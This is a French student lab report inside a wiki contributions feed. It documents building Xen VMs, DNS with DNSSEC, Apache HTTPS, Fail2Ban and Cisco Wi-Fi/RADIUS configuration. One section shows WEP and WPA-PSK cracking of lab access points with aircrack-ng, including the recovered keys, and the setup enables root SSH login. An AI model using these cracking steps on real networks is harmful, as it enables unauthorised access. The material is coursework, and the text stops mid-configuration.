<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="fr">
	<id>https://wiki-se.plil.fr/mediawiki/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Tdelobel</id>
	<title>wiki-se.plil.fr - Contributions [fr]</title>
	<link rel="self" type="application/atom+xml" href="https://wiki-se.plil.fr/mediawiki/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Tdelobel"/>
	<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php/Sp%C3%A9cial:Contributions/Tdelobel"/>
	<updated>2026-05-13T21:34:11Z</updated>
	<subtitle>Contributions</subtitle>
	<generator>MediaWiki 1.39.1</generator>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E6&amp;diff=12581</id>
		<title>Atelier SysRes SE4 2025/2026 E6</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E6&amp;diff=12581"/>
		<updated>2026-02-27T17:53:01Z</updated>

		<summary type="html">&lt;p&gt;Tdelobel : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== '''Compte rendu :''' ===&lt;br /&gt;
&lt;br /&gt;
==== '''Création du bridge dans capbreton''' ====&lt;br /&gt;
Avant de créer nos machines virtuelles, nous ajoutons notre bridge à capbreton dans '''SE42026_cpayet_tdelobel''' :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
auto pont_pacman&lt;br /&gt;
iface pont_pacman inet manual&lt;br /&gt;
    bridge_ports none&lt;br /&gt;
    up ip link set $IFACE up&lt;br /&gt;
    down ip link set $IFACE down&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous utilisons '''ifup''' pour le démarrer.&lt;br /&gt;
&lt;br /&gt;
==== '''Création des VMs''' ====&lt;br /&gt;
Pour créer la machine virtuelle de service et la machine mandataire, nous utilisons les commandes suivantes :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
xen-create-image --hostname=SE4.Manjaro         --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force&lt;br /&gt;
xen-create-image --hostname=SE4.LinusTorvalds   --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* '''Manjaro''' sera la machine de service.&lt;br /&gt;
* '''LinusTorvalds''' sera la machine mandataire.&lt;br /&gt;
&lt;br /&gt;
Puis, nous démarrons les machines avec : &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
xen create /etc/xen/SE4.Manjaro.cfg&lt;br /&gt;
xen create /etc/xen/SE4.LinusTorvalds.cfg&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nos machines sont maintenant listées.&lt;br /&gt;
&lt;br /&gt;
==== '''Partitionnement''' ====&lt;br /&gt;
&lt;br /&gt;
===== '''Sur capbreton''' =====&lt;br /&gt;
Tout d'abord, nous allouons 10 Go d'espace pour /var et /home à notre machine virtuelle :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
lvcreate -n SE4.Manjaro.var -L 10G virtual&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous ajoutons dans '''/etc/xen/SE4.Manjaro.cfg''' : &amp;lt;syntaxhighlight lang=&amp;quot;cfg&amp;quot;&amp;gt;&lt;br /&gt;
disk = [&lt;br /&gt;
            [...],&lt;br /&gt;
            'phy:/dev/virtual/SE4.Manjaro.home,xvda3,w',&lt;br /&gt;
            'phy:/dev/virtual/SE4.Manjaro.var,xvdb1,w'&lt;br /&gt;
        ]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== '''Sur la VM''' =====&lt;br /&gt;
Pour que la configuration soit enregistrée, nous modifions le fichier '''/etc/fstab''' en ajoutant les lignes suivantes :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
/dev/xvda3 /var ext4 defaults 0 2&lt;br /&gt;
/dev/xvdb1 /home ext4 defaults 0 2&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Puis, dans le terminal (à ne surtout pas utiliser sur capbreton !), nous exécutons :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
mkfs -t ext4 /dev/xvda3&lt;br /&gt;
mkfs -t ext4 /dev/xvdb1&lt;br /&gt;
mount /dev/xvda3 /mnt&lt;br /&gt;
mv /var/* /mnt&lt;br /&gt;
umount /mnt&lt;br /&gt;
mount -a&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous pouvons maintenant redémarrer la machine pour vérifier si la configuration persiste. Nous répétons le même schéma pour la machine mandataire.&lt;br /&gt;
&lt;br /&gt;
==== '''Adresses IPv4 et IPv6''' ====&lt;br /&gt;
Tout d'abord, dans notre machine de service, nous attribuons une adresse IPv4 privé et une adresse IPv6. Nous modifions donc le fichier '''/etc/network/interfaces''' :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.10.2/24&lt;br /&gt;
    gateway 192.168.10.1&lt;br /&gt;
&lt;br /&gt;
auto eth1&lt;br /&gt;
iface eth1 inet6 auto&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous ajoutons également le bridge depuis capbreton dans '''/etc/xen/SE4.Manjaro.cfg''' :&amp;lt;syntaxhighlight lang=&amp;quot;cfg&amp;quot;&amp;gt;&lt;br /&gt;
vif = [[...], 'mac=00:16:3E:36:79:D9,bridge=SE4']&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Dans la machine mandataire, nous attribuons une adresse IPv4 du réseau local et privé :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
auto lo                                                                             &lt;br /&gt;
iface lo inet loopback                                                              &lt;br /&gt;
&lt;br /&gt;
auto eth0                                                                           &lt;br /&gt;
iface eth0 inet static                                                              &lt;br /&gt;
        address 192.168.10.1/24                                                     &lt;br /&gt;
&lt;br /&gt;
auto eth1                                                                           &lt;br /&gt;
iface eth1 inet static                                                              &lt;br /&gt;
        address 193.48.57.166/24                                                    &lt;br /&gt;
        gateway 193.48.57.162                                                       &lt;br /&gt;
iface eth1 inet6 auto                                                               &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous ajoutons au fichier '''resolv.conf''' le DNS de Google et installons les outils nécessaires pour la suite (iptables-persistent, ssh, bind9, apache2, etc.).&lt;br /&gt;
&lt;br /&gt;
==== '''Masquerade et SSH''' ====&lt;br /&gt;
Nous mettons en place les règles '''iptables''' pour gérer à la fois le SSH (redirection de port) et le masquerading avec les commandes suivantes :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.10.3:22&lt;br /&gt;
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.10.0/24&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Après avoir sauvegardé avec '''iptables-save''', nous décommentons dans '''/etc/sysctl.conf''' :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Enfin, pour permettre la connexion SSH en tant que root sur toutes les machines virtuelles, nous ajoutons dans '''/etc/ssh/sshd_config''' :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Il n'est plus obligatoire de passer par capbreton pour se connecter aux machines virtuelles. Nous utiliserons les commandes suivantes :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
ssh root@193.48.57.166 #pour la machine mandataire&lt;br /&gt;
ssh root@193.48.57.166 -p 2202 # pour la machine de service&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== '''DNS''' ====&lt;br /&gt;
&lt;br /&gt;
===== '''Machine de service''' =====&lt;br /&gt;
Nous commençons par modifier '''/etc/bind/named.conf.local''' et y ajoutons notre zone principale et celle de notre camarade :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
zone &amp;quot;archlinux.lol&amp;quot; {                                                              &lt;br /&gt;
        type master;                                                                &lt;br /&gt;
        file &amp;quot;/etc/bind/zones/db.archlinux.lol&amp;quot;;                                    &lt;br /&gt;
        allow-transfer{secondaries;};                                               &lt;br /&gt;
        also-notify{hiddensecondaries;};                                            &lt;br /&gt;
        notify yes;                                                                 &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
acl &amp;quot;secondaries&amp;quot; {                                                                 &lt;br /&gt;
        192.168.10.3;                                                               &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe8b:45ed;                                      &lt;br /&gt;
        192.168.10.1;                                                               &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:feaa:bff0;                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
masters &amp;quot;hiddensecondaries&amp;quot; {                                                       &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:feaa:bff0;                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
zone &amp;quot;archlinuxbtw.lol&amp;quot; {                                                           &lt;br /&gt;
        type secondary;                                                             &lt;br /&gt;
        file &amp;quot;/etc/bind/backup/db.archlinuxbtw.lol&amp;quot;;                                &lt;br /&gt;
        primaries{2001:660:4401:60a0:216:3eff:fe8b:45ed;};                          &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                           &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Puis, nous créons notre zone '''db.archlinux.lol''' :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
$TTL 400                                                                            &lt;br /&gt;
                                                                                    &lt;br /&gt;
@ IN SOA ns.archlinux.lol. admin.archlinux.lol. (                                   &lt;br /&gt;
           3611     ; Numéro de version                                             &lt;br /&gt;
          21600     ; Rafraîchissement (6h)                                         &lt;br /&gt;
           3600     ; Re-tentative (1h)                                             &lt;br /&gt;
        2592000     ; Expiration (30j)                                              &lt;br /&gt;
          86400     ; Cache négatif (24h)                                           &lt;br /&gt;
);                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
@ IN NS ns.archlinux.lol.                                                           &lt;br /&gt;
@ IN NS ns.archlinuxbtw.lol.                                                        &lt;br /&gt;
                                                                                    &lt;br /&gt;
ns IN A 193.48.57.166                                                               &lt;br /&gt;
@ IN A 193.48.57.166                                                                &lt;br /&gt;
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe36:79d9                                    &lt;br /&gt;
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe36:79d9                                     &lt;br /&gt;
                                                                                    &lt;br /&gt;
www IN CNAME archlinux.lol.                                                         &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== '''Machine mandataire''' =====&lt;br /&gt;
Dans la machine mandataire, nous passons les zones de notre machine de service en zones secondaires :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
zone &amp;quot;archlinuxbtw.lol&amp;quot; {                                                           &lt;br /&gt;
        type secondary;                                                             &lt;br /&gt;
        file &amp;quot;/etc/bind/backup/db.archlinuxbtw.lol&amp;quot;;                                &lt;br /&gt;
        primaries{2001:660:4401:60a0:216:3eff:fe8b:45ed;};                          &lt;br /&gt;
};                                                                                  &lt;br /&gt;
zone &amp;quot;archlinux.lol&amp;quot; {                                                              &lt;br /&gt;
        type secondary;                                                             &lt;br /&gt;
        file &amp;quot;/etc/bind/backup/db.archlinux.lol&amp;quot;;                                   &lt;br /&gt;
        primaries{2001:660:4401:60a0:216:3eff:fe36:79d9;};                          &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
acl &amp;quot;secondaries&amp;quot; {                                                                 &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe8b:45ed;                                      &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe36:79d9;                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Enfin, nous ajoutons nos zones aux '''Glue records''' de Gandi pour que notre DNS soit reconnu partout dans le monde. Nous pouvons vérifier cela sur le site https://dnschecker.org/.[[Fichier:Dns-check-thomas.png|centré|vignette]]&lt;br /&gt;
&lt;br /&gt;
==== '''DNSSEC''' ====&lt;br /&gt;
Pour sécuriser notre DNS, nous modifions '''/etc/bind/named.conf.local''' :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
zone &amp;quot;archlinux.lol&amp;quot; {                                                              &lt;br /&gt;
        type master;                                                                &lt;br /&gt;
        file &amp;quot;/etc/bind/zones/db.archlinux.lol&amp;quot;;                                    &lt;br /&gt;
        allow-transfer{secondaries;};                                               &lt;br /&gt;
        also-notify{hiddensecondaries;};                                            &lt;br /&gt;
        notify yes;                                                                 &lt;br /&gt;
        key-directory &amp;quot;/etc/bind/keys&amp;quot;;                                             &lt;br /&gt;
        dnssec-policy &amp;quot;dnspol&amp;quot;;                                                     &lt;br /&gt;
        inline-signing yes;&lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
acl &amp;quot;secondaries&amp;quot; {                                                                 &lt;br /&gt;
        192.168.10.3;                                                               &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe8b:45ed;                                      &lt;br /&gt;
        192.168.10.1;                                                               &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:feaa:bff0;                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
masters &amp;quot;hiddensecondaries&amp;quot; {                                                       &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:feaa:bff0;                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
zone &amp;quot;archlinuxbtw.lol&amp;quot; {                                                           &lt;br /&gt;
        type secondary;                                                             &lt;br /&gt;
        file &amp;quot;/etc/bind/backup/db.archlinuxbtw.lol&amp;quot;;                                &lt;br /&gt;
        primaries{2001:660:4401:60a0:216:3eff:fe8b:45ed;};                          &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot; {                                                            &lt;br /&gt;
   keys {                                                                           &lt;br /&gt;
       ksk key-directory lifetime unlimited algorithm 13;                           &lt;br /&gt;
       zsk key-directory lifetime unlimited algorithm 13;                           &lt;br /&gt;
   };                                                                               &lt;br /&gt;
   nsec3param;                                                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous ajoutons un répertoire pour les clés (auquel nous donnons les permissions d'écriture) :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
mkdir /etc/bind/keys &lt;br /&gt;
chown bind:bind /etc/bind/keys &lt;br /&gt;
chmod 750 /etc/bind/keys&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Après avoir redémarré '''bind9''' et '''named''', nous pouvons constater que les clés sont bien générées. Pour vérifier si notre DNS est sécurisé, nous utilisons &amp;lt;nowiki&amp;gt;https://dnsviz.net/&amp;lt;/nowiki&amp;gt;.&lt;br /&gt;
[[Fichier:DNSSEC-thomas.png|centré|vignette]]&lt;br /&gt;
&lt;br /&gt;
==== '''Serveur Apache''' ====&lt;br /&gt;
&lt;br /&gt;
===== '''Sur la machine de service''' =====&lt;br /&gt;
&lt;br /&gt;
Nous générons d'abord notre clé avec :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
openssl req -nodes -newkey rsa:2048 -sha256 -keyout archlinux.lol.key -out archlinux.csr&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Une fois la clé générée, nous récupérons le certificat sur Gandi. Nous créons ensuite notre site dans '''/etc/apache2/sites-available/archlinux.lol.conf''' :&lt;br /&gt;
&lt;br /&gt;
La page html sera enregistré dans '''/var/www/archlinux.lol'''.&lt;br /&gt;
&lt;br /&gt;
Nous effectuons aussi une redirection du port HTTP vers HTTPS.&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;                                                                  &lt;br /&gt;
    ServerName archlinux.lol                                                        &lt;br /&gt;
    ServerAlias www.archlinux.lol                                                   &lt;br /&gt;
    Redirect permanent / https://archlinux.lol/                                     &lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;                                                                      &lt;br /&gt;
                                                                                    &lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;                                                                 &lt;br /&gt;
    ServerName archlinux.lol                                                        &lt;br /&gt;
    ServerAlias www.archlinux.lol                                                   &lt;br /&gt;
    DocumentRoot /var/www/archlinux.lol                                             &lt;br /&gt;
                                                                                    &lt;br /&gt;
    &amp;lt;Directory /var/www/archlinux.lol&amp;gt;                                              &lt;br /&gt;
        Options Indexes FollowSymLinks                                              &lt;br /&gt;
        AllowOverride All                                                           &lt;br /&gt;
        Require all granted                                                         &lt;br /&gt;
    &amp;lt;/Directory&amp;gt;                                                                    &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    ErrorLog ${APACHE_LOG_DIR}/error.log                                            &lt;br /&gt;
    CustomLog /var/log/apache2/secure_access.log combined                           &lt;br /&gt;
                                                                                    &lt;br /&gt;
    SSLEngine on                                                                    &lt;br /&gt;
    SSLCertificateFile /etc/ssl/certs/archlinux.lol.crt                             &lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/private/archlinux.lol.key                        &lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/certs/GandiCert.pem                            &lt;br /&gt;
                                                                                    &lt;br /&gt;
    SSLVerifyClient None                                                            &lt;br /&gt;
                                                                                    &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;                                                                      &lt;br /&gt;
                                                                                    &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Notre site est maintenant accessible en IPv6. Nous configurons ensuite la machine mandataire pour qu'il le soit aussi en IPv4.  &lt;br /&gt;
&lt;br /&gt;
===== '''Sur la machine de mandataire''' =====&lt;br /&gt;
Après avoir récupéré les clés et certificats, nous créons un fichier '''/etc/apache2/sites-available/archlinux.lol-proxy.conf''' :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;                                                                  &lt;br /&gt;
    ServerName archlinux.lol                                                        &lt;br /&gt;
    ServerAlias www.archlinux.lol                                                   &lt;br /&gt;
    Redirect permanent / https://archlinux.lol/                                     &lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;                                                                      &lt;br /&gt;
                                                                                    &lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;                                                                 &lt;br /&gt;
    ServerName archlinux.lol                                                        &lt;br /&gt;
    ServerAlias www.archlinux.lol                                                   &lt;br /&gt;
                                                                                    &lt;br /&gt;
    SSLProxyEngine on                                                               &lt;br /&gt;
    ProxyPass / https://archlinux.lol/                                              &lt;br /&gt;
    ProxyPassReverse / https://archlinux.lol/                                       &lt;br /&gt;
    ProxyPreserveHost on                                                            &lt;br /&gt;
                                                                                    &lt;br /&gt;
    SSLEngine on                                                                    &lt;br /&gt;
    SSLCertificateFile /etc/ssl/certs/archlinux.lol.crt                             &lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/private/archlinux.lol.key                        &lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/certs/GandiCert.pem                            &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    ErrorLog ${APACHE_LOG_DIR}/error.log                                            &lt;br /&gt;
    CustomLog ${APACHE_LOG_DIR}/access.log combined                                 &lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;                                                                      &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Notre site est maintenant disponible partout et en HTTPS.&lt;br /&gt;
[[Fichier:Site-thomas.png|centré|vignette]]&lt;br /&gt;
&lt;br /&gt;
==== '''Fail2Ban''' ====&lt;br /&gt;
Après avoir installé Fail2Ban, nous ajoutons le fichier '''/etc/fail2ban/jail.local''' :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
[DEFAULT]&lt;br /&gt;
allowipv6 = auto&lt;br /&gt;
&lt;br /&gt;
[sshd]&lt;br /&gt;
enable  = true&lt;br /&gt;
port    = ssh&lt;br /&gt;
filter  = sshd&lt;br /&gt;
maxretry = 5&lt;br /&gt;
findtime = 300&lt;br /&gt;
bantime = 600&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous relançons le service et testons avec la commande '''fail2ban-client status sshd''' :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
Status for the jail: sshd                                                           &lt;br /&gt;
|- Filter                                                                           &lt;br /&gt;
|  |- Currently failed: 0                                                           &lt;br /&gt;
|  |- Total failed:     8                                                           &lt;br /&gt;
|  `- File list:        /var/log/auth.log                                           &lt;br /&gt;
`- Actions                                                                          &lt;br /&gt;
   |- Currently banned: 0                                                           &lt;br /&gt;
   |- Total banned:     1                                                           &lt;br /&gt;
   `- Banned IP list:                                                               &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Cette configuration doit être faite sur la machine de service et la machine mandataire.&lt;br /&gt;
&lt;br /&gt;
==== '''Effraction WI-FI''' ====&lt;br /&gt;
&lt;br /&gt;
===== '''Cassage WEP''' =====&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo airodump-ng wlan1&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous trouvons '''cracotte06''' avec son adresse et son canal :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo airodump-ng wlan1 --write dump --bssid 04:DA:D2:9C:50:55 -c4&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Le fichier '''dump''' étant créé, nous récupérons la clé avec :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo  aircrack-ng -b 04:DA:D2:9C:50:55 dump-22.cap&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Résultat :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
                                                                                     Aircrack-ng 1.7 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                                                                       [00:00:00] Tested 525 keys (got 63977 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    1/  2   20(74752) 5B(73216) F0(73216) 1E(72704) 77(72192) 12(71936) 78(71936) ED(71936) 21(71680) EF(71680) 58(71424) AE(71424) 4D(71168) 5A(70656) 02(70400) &lt;br /&gt;
    1    5/  1   48(74496) DA(71936) 47(71680) 55(71680) B9(71168) BD(70656) DE(70656) 01(70400) 77(70400) A2(70400) 6C(70144) 74(70144) 7C(70144) 8E(70144) 92(70144) &lt;br /&gt;
    2   73/  2   CE(66560) CC(66304) E2(66304) DD(66048) ED(66048) 69(65536) 97(65536) A7(65536) AC(65536) B8(65536) 44(65280) 72(65280) D7(65280) EA(65280) F4(65280) &lt;br /&gt;
    3    7/ 11   5C(73984) 14(72960) 6E(72960) E8(72448) 00(71424) EB(71424) 04(71168) 23(70912) 35(70912) AB(70912) 58(70656) 1B(70400) CA(70400) D4(70400) FE(70400) &lt;br /&gt;
    4    0/  3   F6(92416) 2D(73472) 30(72704) 6A(71680) 9D(71680) BD(71680) C9(71680) 2B(71168) 3D(70400) 52(70400) C8(70400) D8(70400) 49(70144) F8(70144) FE(69632) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ FF:FF:FF:FF:FA:BC:07:CB:AE:EE:EE:EE:EE ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== '''Cassage WPA-PSK''' =====&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo airodump-ng wlan1 --write dump --bssid 44:AD:D9:5F:87:05 -c13&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous essayons de récupérer la clé avec un dictionnaire '''dico.txt :'''&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo  aircrack-ng -a2 -w dico.txt -b 44:AD:D9:5F:87:05 dump-23.cap&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Résultat :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
                               Aircrack-ng 1.7 &lt;br /&gt;
&lt;br /&gt;
      [00:28:29] 66973408/100000000 keys tested (39839.22 k/s) &lt;br /&gt;
&lt;br /&gt;
      Time left: 13 minutes, 48 seconds                         66.97%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 66684666 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 63 5F 7F 36 2C 70 49 04 6A 29 11 FE C8 C1 0C FD &lt;br /&gt;
                       4D 16 18 BE C9 48 70 31 C5 7B 13 BD E1 02 8A 15 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== '''Sécurisation Wi-Fi''' ====&lt;br /&gt;
&lt;br /&gt;
===== '''Configuration du routeur''' =====&lt;br /&gt;
Nous configurons notre interface, son VRRP et le DHCP :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
ip dhcp pool PoolThomas                                                             &lt;br /&gt;
 network 10.60.6.0 255.255.255.0&lt;br /&gt;
 dns-server 193.48.57.166                                                           &lt;br /&gt;
 default-router 10.60.6.254                                                         &lt;br /&gt;
!                                                                                   &lt;br /&gt;
...&lt;br /&gt;
vlan 16                                                                             &lt;br /&gt;
 name E6-Thomas                                                                     &lt;br /&gt;
!&lt;br /&gt;
...&lt;br /&gt;
interface Vlan16                                                                    &lt;br /&gt;
 ip address 10.60.6.2 255.255.255.0                                                 &lt;br /&gt;
 ipv6 address 2001:660:4401:60A6::2/64                                              &lt;br /&gt;
 vrrp 16 address-family ipv4                                                        &lt;br /&gt;
  priority 110                                                                      &lt;br /&gt;
  address 10.60.6.1 primary                                                         &lt;br /&gt;
  exit-vrrp                                                                         &lt;br /&gt;
!&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== '''Configuration des bornes Wi-Fi''' =====&lt;br /&gt;
Sur les bornes Wi-Fi, nous appliquons la configuration donnée par le sujet :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
conf t&lt;br /&gt;
&lt;br /&gt;
aaa new-model&lt;br /&gt;
aaa authentication login eap_student5 group radius_student5&lt;br /&gt;
radius-server host 192.168.10.2 auth-port 1812 acct-port 1813 key secret_student6        &lt;br /&gt;
aaa group server radius radius_student5                      &lt;br /&gt;
server 192.168.10.2 auth-port 1812 acct-port 1813        &lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
dot11 ssid VM_SERVICES_6       &lt;br /&gt;
vlan 16         &lt;br /&gt;
authentication open eap eap_student6 &lt;br /&gt;
authentication network-eap eap_student6&lt;br /&gt;
authentication key-management wpa&lt;br /&gt;
mbssid guest-mode&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
encryption vlan 16 mode ciphers aes-ccm                  &lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0.16&lt;br /&gt;
encapsulation dot1Q 16&lt;br /&gt;
